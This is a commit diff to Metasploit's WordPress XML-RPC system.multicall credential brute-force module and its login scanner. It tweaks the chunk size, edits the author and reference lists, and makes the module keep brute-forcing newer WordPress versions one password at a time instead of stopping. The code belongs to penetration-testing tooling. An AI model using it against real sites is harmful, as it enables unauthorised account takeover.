Handing newer version of WP, fallback CHUNKSIE to 1

Author: KINGSABRI

lib/metasploit/framework/login_scanner/wordpress_multicall.rb

@@ -8,30 +8,31 @@ module LoginScanner
       class WordpressMulticall < HTTP
 
         # @!attribute passwords
-        #   @return [Array]
+        # @return [Array]
         attr_accessor :passwords
 
-        # @!attribute chunk_size
-        #   @return [Fixnum]
+        # @!attribute chunk_size, limits number of passwords per XML request
+        # @return [Fixnum]
         attr_accessor :chunk_size
 
-        # @!attribute block_wait
-        #   @return [Fixnum]
+        # @!attribute block_wait, time to wait if got blocked by the target
+        # @return [Fixnum]
         attr_accessor :block_wait
 
         # @!attribute base_uri
-        #   @return [String]
+        # @return [String]
         attr_accessor :base_uri
 
         # @!attribute wordpress_url_xmlrpc
-        #   @return [String]
+        # @return [String]
         attr_accessor :wordpress_url_xmlrpc
 
+
         def set_default
           self.wordpress_url_xmlrpc = 'xmlrpc.php'
           self.block_wait = 6
           self.base_uri = '/'
-          self.chunk_size = 1800
+          self.chunk_size = 1700
         end
 
         # Returns the XML data that is used for the login.

modules/auxiliary/scanner/http/wordpress_multicall_creds.rb

@@ -13,29 +13,25 @@ class Metasploit3 < Msf::Auxiliary
   include Msf::Auxiliary::Scanner
   include Msf::Auxiliary::AuthBrute
   include Msf::Auxiliary::Report
+  # include Metasploit::Framework::LoginScanner::WordpressMulticall
 
   def initialize(info = {})
     super(update_info(info,
       'Name'         => 'Wordpress XML-RPC system.multicall Credential Collector',
       'Description'  => %q{
         This module attempts to find Wordpress credentials by abusing the XMLRPC
         APIs. Wordpress versions prior to 4.4.1 are suitable for this type of
-        technique. For other versions, please try the wordpress_xmlrpc_login
-        module instead.
+        technique. For newer versions, the script will drop the CHUNKSIZE to 1 automatically.
       },
       'Author'      =>
         [
-          'Cenk Kalpakoglu <cenk.kalpakoglu[at]gmail.com>',
           'KingSabri <King.Sabri[at]gmail.com>' ,
           'William <WCoppola[at]Lares.com>',
           'sinn3r'
         ],
       'License'     => MSF_LICENSE,
       'References'  =>
         [
-          ['URL', 'https://wordpress.org/'],
-          ['URL', 'http://www.ethicalhack3r.co.uk/security/introduction-to-the-wordpress-xml-rpc-api/'],
-          ['CVE', '1999-0502'], # Weak password
           ['URL', 'https://blog.cloudflare.com/a-look-at-the-new-wordpress-brute-force-amplification-attack/' ],
           ['URL', 'https://blog.sucuri.net/2014/07/new-brute-force-attacks-exploiting-xmlrpc-in-wordpress.html' ]
         ],
@@ -49,7 +45,7 @@ module instead.
     register_options(
       [
         OptInt.new('BLOCKEDWAIT', [ true, 'Time(minutes) to wait if got blocked', 6 ]),
-        OptInt.new('CHUNKSIZE',   [ true, 'Number of passwords need to be sent per request. (1700 is the max)', 1500 ])
+        OptInt.new('CHUNKSIZE',   [ true, 'Number of passwords need to be sent per request. (1700 is the max)', 1500 ]),
       ], self.class)
 
     # Not supporting these options, because we are not actually letting the API to process the
@@ -84,8 +80,10 @@ def check_setup
       print_error("#{peer}:#{rport}#{wordpress_url_xmlrpc} does not enable XMLRPC")
       false
     elsif Gem::Version.new(version) >= Gem::Version.new('4.4.1')
-      print_error("#{peer}:#{rport}#{wordpress_url_xmlrpc} Target's version (#{version}) is not vulnerable to this attack.")
-      false
+      print_error("#{peer}#{wordpress_url_xmlrpc} Target's version (#{version}) is not vulnerable to this attack.")
+      vprint_status("Dropping CHUNKSIZE from #{datastore['CHUNKSIZE']} to 1")
+      datastore['CHUNKSIZE'] = 1
+      true
     else
       print_status("Target #{peer} is running Wordpress")
       true